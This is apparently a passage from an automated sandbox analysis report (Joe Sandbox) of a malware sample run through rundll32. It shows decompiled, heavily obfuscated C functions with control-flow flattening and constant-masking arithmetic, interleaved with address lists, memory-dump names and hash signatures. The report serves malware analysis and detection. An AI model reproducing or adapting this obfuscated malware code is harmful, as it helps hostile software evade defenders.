				_v56 = _v56 ^ 0xfa290e75;
				_t163 = 0;
				_v56 = _v56 >> 4;
				_t146 = 0x6cc7f8c;
				_v56 = _v56 ^ 0x0fa05392;
				_v60 = 0xdd8405;
				_v60 = _v60 + 0xffff7544;
				_t159 = 0x13;
				_v60 = _v60 / _t159;
				_t160 = 0x4a;
				_v60 = _v60 * 0x44;
				_v60 = _v60 ^ 0x03147b15;
				_v40 = 0xb1f638;
				_v40 = _v40 / _t160;
				_v40 = _v40 + 0xfdde;
				_v40 = _v40 ^ 0x000bffc0;
				_v20 = 0xc1e326;
				_v20 = _v20 << 0xb;
				_v20 = _v20 ^ 0x0f1113ff;
				_v24 = 0x9dff8e;
				_v24 = _v24 << 5;
				_v24 = _v24 ^ 0x13be58e4;
				_v44 = 0x26f48e;
				_v44 = _v44 >> 3;
				_v44 = _v44 >> 4;
				_v44 = _v44 ^ 0x0002f448;
				_v48 = 0xa078f9;
				_t161 = 0x1c;
				_v48 = _v48 * 0xe;
				_v48 = _v48 ^ 0x04e4b6a4;
				_v48 = _v48 ^ 0x0c2dbe80;
				_v52 = 0xb739f4;
				_v52 = _v52 ^ 0x18b1fcfd;
				_v52 = _v52 ^ 0x2d0276e6;
				_v52 = _v52 ^ 0x3502a25a;
				_v28 = 0x1e50a5;
				_v28 = _v28 / _t161;
				_v28 = _v28 ^ 0x0008472d;
				_v32 = 0x99faaf;
				_v32 = _v32 + 0xfffffde3;
				_v32 = _v32 ^ 0x0091a9c4;
				_v36 = 0x23e8f3;
				_v36 = _v36 >> 1;
				_v36 = _v36 * 0x5a;
				_v36 = _v36 ^ 0x064f5444;
				_v8 = 0xf9c016;
				_v8 = _v8 | 0x76d0de1d;
				_v8 = _v8 ^ 0x76f7039e;
				_v12 = 0x650156;
				_v12 = _v12 >> 5;
				_v12 = _v12 ^ 0x000fa496;
				_v16 = 0x5361c2;
				_v16 = _v16 ^ 0x712c2ae6;
				_v16 = _v16 ^ 0x71790bc8;
				_t162 = _v4;
				do {
					while(_t146 != 0x2367fc3) {
						if(_t146 == 0x555e5ab) {
							E001913B1(_v4, _v44, _v48, _v52, 1, _a8, 1, _t146, _v28, _v32, _a4);
							_t166 =  &(_t166[9]);
							_t146 = 0xbed5482;
							_t163 =  !=  ? 1 : _t163;
							continue;
						} else {
							if(_t146 == 0x6cc7f8c) {
								_t146 = 0x9230dbb;
								continue;
							} else {
								if(_t146 == 0x9230dbb) {
									_t140 = E00179685(_t146);
									_t162 = _t140;
									if(_t140 != 0xffffffff) {
										_t146 = 0x2367fc3;
										continue;
									}
								} else {
									if(_t146 != 0xbed5482) {
										goto L15;
									} else {
										E00184DAD(_v36, _v8, _v4, _v12, _v16);
									}
								}
							}
						}
						L7:
						return _t163;
					}
					_t136 = E0018FB2B(_v40,  &_v4, _v20, _v24, _t162);
					_t166 =  &(_t166[3]);
					if(_t136 == 0) {
						_t146 = 0x362db31;
						goto L15;
					} else {
						_t146 = 0x555e5ab;
						continue;
					}
					goto L7;
					L15:
				} while (_t146 != 0x362db31);
				goto L7;
			}



























                                                                                                                      0x0017b424
                                                                                                                      0x0017b425
                                                                                                                      0x0017b429
                                                                                                                      0x0017b42d
                                                                                                                      0x0017b431
                                                                                                                      0x0017b435
                                                                                                                      0x0017b436
                                                                                                                      0x0017b437
                                                                                                                      0x0017b43c
                                                                                                                      0x0017b444
                                                                                                                      0x0017b447
                                                                                                                      0x0017b451
                                                                                                                      0x0017b459
                                                                                                                      0x0017b45b
                                                                                                                      0x0017b460
                                                                                                                      0x0017b465
                                                                                                                      0x0017b46d
                                                                                                                      0x0017b475
                                                                                                                      0x0017b483
                                                                                                                      0x0017b488
                                                                                                                      0x0017b493
                                                                                                                      0x0017b496
                                                                                                                      0x0017b49a
                                                                                                                      0x0017b4a2
                                                                                                                      0x0017b4b2
                                                                                                                      0x0017b4b6
                                                                                                                      0x0017b4be
                                                                                                                      0x0017b4c6
                                                                                                                      0x0017b4ce
                                                                                                                      0x0017b4d3
                                                                                                                      0x0017b4db
                                                                                                                      0x0017b4e3
                                                                                                                      0x0017b4e8
                                                                                                                      0x0017b4f0
                                                                                                                      0x0017b4f8
                                                                                                                      0x0017b4fd
                                                                                                                      0x0017b502
                                                                                                                      0x0017b50a
                                                                                                                      0x0017b517
                                                                                                                      0x0017b518
                                                                                                                      0x0017b51c
                                                                                                                      0x0017b524
                                                                                                                      0x0017b52c
                                                                                                                      0x0017b534
                                                                                                                      0x0017b53c
                                                                                                                      0x0017b544
                                                                                                                      0x0017b54c
                                                                                                                      0x0017b55a
                                                                                                                      0x0017b55e
                                                                                                                      0x0017b566
                                                                                                                      0x0017b56e
                                                                                                                      0x0017b576
                                                                                                                      0x0017b57e
                                                                                                                      0x0017b586
                                                                                                                      0x0017b58f
                                                                                                                      0x0017b593
                                                                                                                      0x0017b59b
                                                                                                                      0x0017b5a3
                                                                                                                      0x0017b5ab
                                                                                                                      0x0017b5b3
                                                                                                                      0x0017b5bb
                                                                                                                      0x0017b5c5
                                                                                                                      0x0017b5cd
                                                                                                                      0x0017b5d5
                                                                                                                      0x0017b5dd
                                                                                                                      0x0017b5e5
                                                                                                                      0x0017b5e9
                                                                                                                      0x0017b5e9
                                                                                                                      0x0017b5f7
                                                                                                                      0x0017b67d
                                                                                                                      0x0017b682
                                                                                                                      0x0017b685
                                                                                                                      0x0017b68c
                                                                                                                      0x00000000
                                                                                                                      0x0017b5f9
                                                                                                                      0x0017b5ff
                                                                                                                      0x0017b653
                                                                                                                      0x00000000
                                                                                                                      0x0017b601
                                                                                                                      0x0017b607
                                                                                                                      0x0017b643
                                                                                                                      0x0017b648
                                                                                                                      0x0017b64d
                                                                                                                      0x0017b64f
                                                                                                                      0x00000000
                                                                                                                      0x0017b64f
                                                                                                                      0x0017b609
                                                                                                                      0x0017b60f
                                                                                                                      0x00000000
                                                                                                                      0x0017b615
                                                                                                                      0x0017b629
                                                                                                                      0x0017b62e
                                                                                                                      0x0017b60f
                                                                                                                      0x0017b607
                                                                                                                      0x0017b5ff
                                                                                                                      0x0017b632
                                                                                                                      0x0017b63a
                                                                                                                      0x0017b63a
                                                                                                                      0x0017b6a5
                                                                                                                      0x0017b6aa
                                                                                                                      0x0017b6af
                                                                                                                      0x0017b6bb
                                                                                                                      0x00000000
                                                                                                                      0x0017b6b1
                                                                                                                      0x0017b6b1
                                                                                                                      0x00000000
                                                                                                                      0x0017b6b1
                                                                                                                      0x00000000
                                                                                                                      0x0017b6c0
                                                                                                                      0x0017b6c0
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ('$9a$*,q
                                                                                                                      • API String ID: 0-3312093510
                                                                                                                      • Opcode ID: 91551d8a3a33aa242dcb579ab556c5323ead86a65d26f531dae9fc8f6b11891c
                                                                                                                      • Instruction ID: fb7fa9d96f43e1a8715b51d9ac10e2f08c4e5078d5039cb2a35bc4d0e9bd5596
                                                                                                                      • Opcode Fuzzy Hash: 91551d8a3a33aa242dcb579ab556c5323ead86a65d26f531dae9fc8f6b11891c
                                                                                                                      • Instruction Fuzzy Hash: F36110711083419BC758CE21999A82BBAF2FBC4758F548A1DF6969A260C3B1CA59CB43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0018C38F Relevance: 3.9, Strings: 3, Instructions: 155COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E0018C38F(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v4;
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t139;
				void* _t153;
				signed int _t154;
				void* _t157;
				void* _t169;
				signed int _t170;
				signed int _t171;
				void* _t173;
				signed int* _t175;

				_t155 = _a4;
				_push(_a8);
				_t173 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0017CF25(_t139);
				_v8 = _v8 & 0x00000000;
				_t175 =  &(( &_v80)[4]);
				_v4 = _v4 & 0x00000000;
				_v16 = 0x6f933c;
				_t169 = 0;
				_v12 = 0xacafca;
				_t157 = 0x2c6486;
				_v40 = 0xf6c939;
				_t170 = 0xb;
				_v40 = _v40 / _t170;
				_v40 = _v40 ^ 0x00166f60;
				_v36 = 0x3062f8;
				_v36 = _v36 << 9;
				_v36 = _v36 ^ 0x60c5f010;
				_v56 = 0xc1f429;
				_v56 = _v56 << 9;
				_v56 = _v56 << 3;
				_v56 = _v56 ^ 0x5f429000;
				_v80 = 0x6a6c05;
				_v80 = _v80 | 0xf56e7669;
				_t171 = 0x32;
				_v80 = _v80 * 0x6f;
				_v80 = _v80 + 0xffff851e;
				_v80 = _v80 ^ 0x6ae37c08;
				_v60 = 0x567c0c;
				_v60 = _v60 + 0xd503;
				_v60 = _v60 * 0x3a;
				_v60 = _v60 ^ 0x13c3775e;
				_v64 = 0x59a2ac;
				_v64 = _v64 | 0x5ac15ac1;
				_v64 = _v64 ^ 0x94d4ce27;
				_v64 = _v64 ^ 0xce05e559;
				_v44 = 0x50d454;
				_v44 = _v44 * 0x6a;
				_v44 = _v44 ^ 0x2175139d;
				_v48 = 0x5a75fb;
				_v48 = _v48 * 0x57;
				_v48 = _v48 ^ 0x1eb14dac;
				_v24 = 0x99b258;
				_v24 = _v24 << 4;
				_v24 = _v24 ^ 0x099f4f84;
				_v76 = 0x853d43;
				_v76 = _v76 >> 1;
				_v76 = _v76 >> 0xe;
				_v76 = _v76 | 0x5f7f2022;
				_v76 = _v76 ^ 0x5f753756;
				_v28 = 0xded29;
				_v28 = _v28 | 0xc4be8170;
				_v28 = _v28 ^ 0xc4b8b15a;
				_v32 = 0x545bb5;
				_v32 = _v32 + 0xe4b1;
				_v32 = _v32 ^ 0x005c5734;
				_v68 = 0xaed47d;
				_v68 = _v68 << 0xf;
				_v68 = _v68 | 0x1d211fc5;
				_v68 = _v68 / _t171;
				_v68 = _v68 ^ 0x02801ca0;
				_v52 = 0x7d6e82;
				_v52 = _v52 >> 0x10;
				_v52 = _v52 * 0x56;
				_v52 = _v52 ^ 0x0007d38d;
				_v72 = 0xcd2745;
				_v72 = _v72 ^ 0xed8bacb0;
				_v72 = _v72 + 0xffffdf8c;
				_v72 = _v72 | 0xe372d41f;
				_v72 = _v72 ^ 0xef7557f2;
				_v20 = 0x88cfe7;
				_v20 = _v20 >> 0xe;
				_v20 = _v20 ^ 0x0008c4a6;
				_t172 = _v20;
				while(_t157 != 0x2c6486) {
					if(_t157 == 0x2a600e7) {
						E00184DAD(_v68, _v52, _t172, _v72, _v20);
					} else {
						if(_t157 == 0xbcc0c39) {
							_t153 = E0017EEB8(_v24, _v76, _t172,  *((intOrPtr*)(_t155 + 4)), _t157, _t155 + 4, _v28, _v32,  *_t155);
							_t175 =  &(_t175[7]);
							_t169 = _t153;
							_t157 = 0x2a600e7;
							continue;
						} else {
							if(_t157 != 0xd3b3a19) {
								L9:
								if(_t157 != 0xb00d47) {
									continue;
								} else {
								}
							} else {
								_t154 = E0018E938(_v36, _v56, _v80, _v60, _v40, _t157, _v64, _v44, _t157, _v48, 0, _t173);
								_t172 = _t154;
								_t175 =  &(_t175[0xa]);
								if(_t154 != 0xffffffff) {
									_t157 = 0xbcc0c39;
									continue;
								}
							}
						}
					}
					return _t169;
				}
				_t157 = 0xd3b3a19;
				goto L9;
			}
































                                                                                                                      0x0018c393
                                                                                                                      0x0018c39a
                                                                                                                      0x0018c39e
                                                                                                                      0x0018c3a0
                                                                                                                      0x0018c3a1
                                                                                                                      0x0018c3a2
                                                                                                                      0x0018c3a3
                                                                                                                      0x0018c3a8
                                                                                                                      0x0018c3ad
                                                                                                                      0x0018c3b0
                                                                                                                      0x0018c3b7
                                                                                                                      0x0018c3bf
                                                                                                                      0x0018c3c1
                                                                                                                      0x0018c3c9
                                                                                                                      0x0018c3ce
                                                                                                                      0x0018c3dc
                                                                                                                      0x0018c3e1
                                                                                                                      0x0018c3e7
                                                                                                                      0x0018c3ef
                                                                                                                      0x0018c3f7
                                                                                                                      0x0018c3fc
                                                                                                                      0x0018c404
                                                                                                                      0x0018c40c
                                                                                                                      0x0018c411
                                                                                                                      0x0018c416
                                                                                                                      0x0018c41e
                                                                                                                      0x0018c426
                                                                                                                      0x0018c433
                                                                                                                      0x0018c434
                                                                                                                      0x0018c438
                                                                                                                      0x0018c440
                                                                                                                      0x0018c448
                                                                                                                      0x0018c450
                                                                                                                      0x0018c45d
                                                                                                                      0x0018c461
                                                                                                                      0x0018c469
                                                                                                                      0x0018c471
                                                                                                                      0x0018c479
                                                                                                                      0x0018c481
                                                                                                                      0x0018c489
                                                                                                                      0x0018c496
                                                                                                                      0x0018c49a
                                                                                                                      0x0018c4a2
                                                                                                                      0x0018c4af
                                                                                                                      0x0018c4b3
                                                                                                                      0x0018c4bb
                                                                                                                      0x0018c4c3
                                                                                                                      0x0018c4c8
                                                                                                                      0x0018c4d0
                                                                                                                      0x0018c4d8
                                                                                                                      0x0018c4dc
                                                                                                                      0x0018c4e1
                                                                                                                      0x0018c4e9
                                                                                                                      0x0018c4f1
                                                                                                                      0x0018c4f9
                                                                                                                      0x0018c501
                                                                                                                      0x0018c509
                                                                                                                      0x0018c511
                                                                                                                      0x0018c519
                                                                                                                      0x0018c521
                                                                                                                      0x0018c529
                                                                                                                      0x0018c52e
                                                                                                                      0x0018c53c
                                                                                                                      0x0018c540
                                                                                                                      0x0018c548
                                                                                                                      0x0018c550
                                                                                                                      0x0018c55a
                                                                                                                      0x0018c55e
                                                                                                                      0x0018c566
                                                                                                                      0x0018c56e
                                                                                                                      0x0018c576
                                                                                                                      0x0018c57e
                                                                                                                      0x0018c586
                                                                                                                      0x0018c58e
                                                                                                                      0x0018c596
                                                                                                                      0x0018c59b
                                                                                                                      0x0018c5a3
                                                                                                                      0x0018c5a7
                                                                                                                      0x0018c5b9
                                                                                                                      0x0018c65c
                                                                                                                      0x0018c5bf
                                                                                                                      0x0018c5c5
                                                                                                                      0x0018c624
                                                                                                                      0x0018c629
                                                                                                                      0x0018c62c
                                                                                                                      0x0018c62e
                                                                                                                      0x00000000
                                                                                                                      0x0018c5c7
                                                                                                                      0x0018c5cd
                                                                                                                      0x0018c63d
                                                                                                                      0x0018c643
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0018c649
                                                                                                                      0x0018c5cf
                                                                                                                      0x0018c5f4
                                                                                                                      0x0018c5f9
                                                                                                                      0x0018c5fb
                                                                                                                      0x0018c601
                                                                                                                      0x0018c603
                                                                                                                      0x00000000
                                                                                                                      0x0018c603
                                                                                                                      0x0018c601
                                                                                                                      0x0018c5cd
                                                                                                                      0x0018c5c5
                                                                                                                      0x0018c66d
                                                                                                                      0x0018c66d
                                                                                                                      0x0018c638
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )$4W\$V7u_
                                                                                                                      • API String ID: 0-1304481894
                                                                                                                      • Opcode ID: 7d0e0d148a11cd35a0702ef9378e6d2ffe14927d1b48726e3f76aff6e6edbe8e
                                                                                                                      • Instruction ID: fd2e05af0fb6760be246e429f983f9e0b5ae69a924e4b7de2e28bef22bf2244b
                                                                                                                      • Opcode Fuzzy Hash: 7d0e0d148a11cd35a0702ef9378e6d2ffe14927d1b48726e3f76aff6e6edbe8e
                                                                                                                      • Instruction Fuzzy Hash: 7E712F710093409FC758DF61C54A91BBBF1FBC5B58F104A1DF2969A260D3B28A09CF97
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 001904DE Relevance: 3.9, Strings: 3, Instructions: 136COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E001904DE(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				void* _t114;
				void* _t125;
				void* _t128;
				signed int _t132;
				void* _t135;
				void* _t148;
				signed int* _t151;

				_push(_a12);
				_t147 = _a8;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0017CF25(_t114);
				_v60 = 0xcc4817;
				_t151 =  &(( &_v96)[5]);
				_v60 = _v60 << 8;
				_v60 = _v60 ^ 0xcc47e657;
				_t148 = 0;
				_v68 = 0xe0ed25;
				_t135 = 0xdcadf3a;
				_v68 = _v68 | 0xce8f6412;
				_v68 = _v68 ^ 0xf3afd128;
				_v68 = _v68 ^ 0x3d42c27e;
				_v72 = 0x9a5a35;
				_v72 = _v72 >> 7;
				_t132 = 0x47;
				_v72 = _v72 * 0x61;
				_v72 = _v72 ^ 0x007dafa6;
				_v76 = 0x100281;
				_v76 = _v76 + 0xffff4995;
				_v76 = _v76 ^ 0x3bbc9aa1;
				_v76 = _v76 ^ 0x3bbd0b56;
				_v84 = 0xc6f502;
				_v84 = _v84 / _t132;
				_v84 = _v84 >> 1;
				_v84 = _v84 | 0x31db5564;
				_v84 = _v84 ^ 0x31df2935;
				_v88 = 0xec4ee3;
				_t44 =  &_v88; // 0xec4ee3
				_v88 =  *_t44 * 0x67;
				_v88 = _v88 >> 3;
				_v88 = _v88 | 0x81ddbea1;
				_v88 = _v88 ^ 0x8bf24dda;
				_v92 = 0xa20219;
				_v92 = _v92 + 0x973c;
				_v92 = _v92 | 0xc6adcdd8;
				_v92 = _v92 << 0xa;
				_v92 = _v92 ^ 0xbf7a6030;
				_v96 = 0x474fb;
				_v96 = _v96 + 0x4e06;
				_v96 = _v96 * 0x4d;
				_v96 = _v96 ^ 0xb0fe0c99;
				_v96 = _v96 ^ 0xb19d06b7;
				_v52 = 0x7e1eaf;
				_v52 = _v52 ^ 0x3657a741;
				_v52 = _v52 ^ 0x362fc7d5;
				_v80 = 0x982156;
				_v80 = _v80 >> 1;
				_v80 = _v80 * 0x77;
				_v80 = _v80 * 0x51;
				_v80 = _v80 ^ 0x3002d3c9;
				_v56 = 0xfe8a73;
				_v56 = _v56 | 0x35e06d03;
				_v56 = _v56 ^ 0x35fae637;
				_v64 = 0x133817;
				_v64 = _v64 | 0xd744828f;
				_v64 = _v64 + 0x2427;
				_v64 = _v64 ^ 0xd75b1468;
				do {
					while(_t135 != 0x54f2717) {
						if(_t135 == 0x5ba048a) {
							_t128 = E0018B9B1(_v84, _v88, __eflags, _t147 + 0x34, _v92,  &_v48, _v96);
							_t151 =  &(_t151[4]);
							__eflags = _t128;
							if(__eflags != 0) {
								_t135 = 0x54f2717;
								continue;
							}
						} else {
							if(_t135 == 0xb11095c) {
								E001864C5(_v60, _v68, _v72, _v76, _a4,  &_v48);
								_t151 =  &(_t151[4]);
								_t135 = 0x5ba048a;
								continue;
							} else {
								if(_t135 != 0xdcadf3a) {
									goto L10;
								} else {
									_t135 = 0xb11095c;
									continue;
								}
							}
						}
						goto L11;
					}
					_t125 = E0018B9B1(_v52, _v80, __eflags, _t147 + 0x10, _v56,  &_v48, _v64);
					_t151 =  &(_t151[4]);
					__eflags = _t125;
					_t148 =  !=  ? 1 : _t148;
					_t135 = 0xe1bb211;
					L10:
					__eflags = _t135 - 0xe1bb211;
				} while (__eflags != 0);
				L11:
				return _t148;
			}























                                                                                                                      0x001904e5
                                                                                                                      0x001904e9
                                                                                                                      0x001904ed
                                                                                                                      0x001904ee
                                                                                                                      0x001904f2
                                                                                                                      0x001904f3
                                                                                                                      0x001904f4
                                                                                                                      0x001904f9
                                                                                                                      0x00190501
                                                                                                                      0x00190504
                                                                                                                      0x0019050b
                                                                                                                      0x00190513
                                                                                                                      0x00190515
                                                                                                                      0x0019051d
                                                                                                                      0x00190522
                                                                                                                      0x0019052f
                                                                                                                      0x00190537
                                                                                                                      0x0019053f
                                                                                                                      0x00190547
                                                                                                                      0x00190553
                                                                                                                      0x00190554
                                                                                                                      0x00190558
                                                                                                                      0x00190560
                                                                                                                      0x00190568
                                                                                                                      0x00190570
                                                                                                                      0x00190578
                                                                                                                      0x00190580
                                                                                                                      0x00190593
                                                                                                                      0x00190597
                                                                                                                      0x0019059b
                                                                                                                      0x001905a3
                                                                                                                      0x001905ab
                                                                                                                      0x001905b3
                                                                                                                      0x001905b8
                                                                                                                      0x001905bc
                                                                                                                      0x001905c1
                                                                                                                      0x001905c9
                                                                                                                      0x001905d1
                                                                                                                      0x001905d9
                                                                                                                      0x001905e1
                                                                                                                      0x001905e9
                                                                                                                      0x001905ee
                                                                                                                      0x001905f6
                                                                                                                      0x001905fe
                                                                                                                      0x0019060b
                                                                                                                      0x0019060f
                                                                                                                      0x00190617
                                                                                                                      0x0019061f
                                                                                                                      0x00190627
                                                                                                                      0x0019062f
                                                                                                                      0x00190637
                                                                                                                      0x0019063f
                                                                                                                      0x00190648
                                                                                                                      0x00190651
                                                                                                                      0x00190655
                                                                                                                      0x0019065d
                                                                                                                      0x00190665
                                                                                                                      0x0019066d
                                                                                                                      0x00190675
                                                                                                                      0x0019067d
                                                                                                                      0x00190685
                                                                                                                      0x0019068d
                                                                                                                      0x00190695
                                                                                                                      0x00190695
                                                                                                                      0x0019069f
                                                                                                                      0x001906f6
                                                                                                                      0x001906fb
                                                                                                                      0x001906fe
                                                                                                                      0x00190700
                                                                                                                      0x00190702
                                                                                                                      0x00000000
                                                                                                                      0x00190702
                                                                                                                      0x001906a1
                                                                                                                      0x001906a3
                                                                                                                      0x001906ce
                                                                                                                      0x001906d3
                                                                                                                      0x001906d6
                                                                                                                      0x00000000
                                                                                                                      0x001906a5
                                                                                                                      0x001906ab
                                                                                                                      0x00000000
                                                                                                                      0x001906b1
                                                                                                                      0x001906b1
                                                                                                                      0x00000000
                                                                                                                      0x001906b1
                                                                                                                      0x001906ab
                                                                                                                      0x001906a3
                                                                                                                      0x00000000
                                                                                                                      0x0019069f
                                                                                                                      0x0019071f
                                                                                                                      0x00190726
                                                                                                                      0x0019072a
                                                                                                                      0x0019072c
                                                                                                                      0x0019072f
                                                                                                                      0x00190734
                                                                                                                      0x00190734
                                                                                                                      0x00190734
                                                                                                                      0x00190741
                                                                                                                      0x00190749

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %$'$$N
                                                                                                                      • API String ID: 0-2135679241
                                                                                                                      • Opcode ID: 97615591f5f084c9a38ef9eec9de6edeef0eef2f1fdc60eea6539c0a4db16790
                                                                                                                      • Instruction ID: dd57cdf6c9096fde1f00e45e4a413e21b316b96a56bfc6f5afe724e0a8566d93
                                                                                                                      • Opcode Fuzzy Hash: 97615591f5f084c9a38ef9eec9de6edeef0eef2f1fdc60eea6539c0a4db16790
                                                                                                                      • Instruction Fuzzy Hash: 135132B15083829FCB49CF21C58681BBBF4FBD8748F505A1DF5A696220D3B1DA598F82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0018026B Relevance: 3.9, Strings: 3, Instructions: 134COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E0018026B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				void* _t108;
				void* _t117;
				void* _t124;
				void* _t126;
				void* _t141;
				signed int _t142;
				signed int _t143;
				signed int* _t146;

				_push(_a12);
				_t140 = _a4;
				_t124 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0017CF25(_t108);
				_v92 = 0x51c9e1;
				_t146 =  &(( &_v96)[5]);
				_v92 = _v92 << 4;
				_t141 = 0;
				_t126 = 0x4bb83f6;
				_t142 = 0x49;
				_v92 = _v92 * 0x6e;
				_v92 = _v92 + 0x829d;
				_v92 = _v92 ^ 0x32495c11;
				_v68 = 0x73c01f;
				_v68 = _v68 + 0x1dcd;
				_v68 = _v68 ^ 0x00720d8f;
				_v96 = 0xb49fc9;
				_v96 = _v96 + 0x43a3;
				_v96 = _v96 ^ 0x15acb626;
				_v96 = _v96 << 0x10;
				_v96 = _v96 ^ 0x554d7300;
				_v84 = 0x939dbf;
				_v84 = _v84 >> 0xf;
				_v84 = _v84 / _t142;
				_v84 = _v84 ^ 0x000cd20a;
				_v60 = 0xb12a06;
				_v60 = _v60 | 0x23fd9b15;
				_v60 = _v60 ^ 0x23fc0752;
				_v76 = 0x2839ff;
				_v76 = _v76 + 0xfffff40d;
				_v76 = _v76 << 4;
				_v76 = _v76 ^ 0x0280e51a;
				_v80 = 0xa0e526;
				_v80 = _v80 | 0xbc5e80d8;
				_v80 = _v80 >> 7;
				_v80 = _v80 ^ 0x017df397;
				_v64 = 0xa3347;
				_t143 = 0x14;
				_v64 = _v64 * 0x36;
				_v64 = _v64 ^ 0x02285917;
				_v88 = 0x8f496e;
				_v88 = _v88 + 0x138c;
				_v88 = _v88 + 0x9d7d;
				_v88 = _v88 / _t143;
				_v88 = _v88 ^ 0x000c7ae1;
				_v72 = 0x3c508e;
				_v72 = _v72 ^ 0xe86d4278;
				_v72 = _v72 | 0x3236ed5f;
				_v72 = _v72 ^ 0xfa734a26;
				_v52 = 0x119dd9;
				_v52 = _v52 ^ 0x40537751;
				_v52 = _v52 ^ 0x404ccff2;
				_v56 = 0x89ec9d;
				_v56 = _v56 ^ 0xd17cb195;
				_v56 = _v56 ^ 0xd1fa716b;
				do {
					while(_t126 != 0x360725a) {
						if(_t126 == 0x4bb83f6) {
							_t126 = 0x9f53cee;
							continue;
						} else {
							if(_t126 == 0x6abf560) {
								__eflags = E0018B9B1(_v88, _v72, __eflags, _t140 + 4, _v52,  &_v48, _v56);
								_t141 =  !=  ? 1 : _t141;
							} else {
								if(_t126 != 0x9f53cee) {
									goto L10;
								} else {
									E001864C5(_v92, _v68, _v96, _v84, _t124,  &_v48);
									_t146 =  &(_t146[4]);
									_t126 = 0x360725a;
									continue;
								}
							}
						}
						L13:
						return _t141;
					}
					_t117 = E0017B09F(_v60, _v76,  &_v48, _v80, _t140, _v64);
					_t146 =  &(_t146[4]);
					__eflags = _t117;
					if(__eflags == 0) {
						_t126 = 0x3e1d0be;
						goto L10;
					} else {
						_t126 = 0x6abf560;
						continue;
					}
					goto L13;
					L10:
					__eflags = _t126 - 0x3e1d0be;
				} while (__eflags != 0);
				goto L13;
			}
























                                                                                                                      0x00180272
                                                                                                                      0x00180276
                                                                                                                      0x0018027a
                                                                                                                      0x0018027c
                                                                                                                      0x00180280
                                                                                                                      0x00180281
                                                                                                                      0x00180282
                                                                                                                      0x00180283
                                                                                                                      0x00180288
                                                                                                                      0x00180290
                                                                                                                      0x00180293
                                                                                                                      0x0018029f
                                                                                                                      0x001802a1
                                                                                                                      0x001802a8
                                                                                                                      0x001802ab
                                                                                                                      0x001802af
                                                                                                                      0x001802b7
                                                                                                                      0x001802bf
                                                                                                                      0x001802c7
                                                                                                                      0x001802cf
                                                                                                                      0x001802d7
                                                                                                                      0x001802df
                                                                                                                      0x001802e7
                                                                                                                      0x001802ef
                                                                                                                      0x001802f4
                                                                                                                      0x001802fc
                                                                                                                      0x00180304
                                                                                                                      0x00180311
                                                                                                                      0x00180315
                                                                                                                      0x0018031d
                                                                                                                      0x00180325
                                                                                                                      0x0018032d
                                                                                                                      0x00180335
                                                                                                                      0x0018033d
                                                                                                                      0x00180345
                                                                                                                      0x0018034a
                                                                                                                      0x00180352
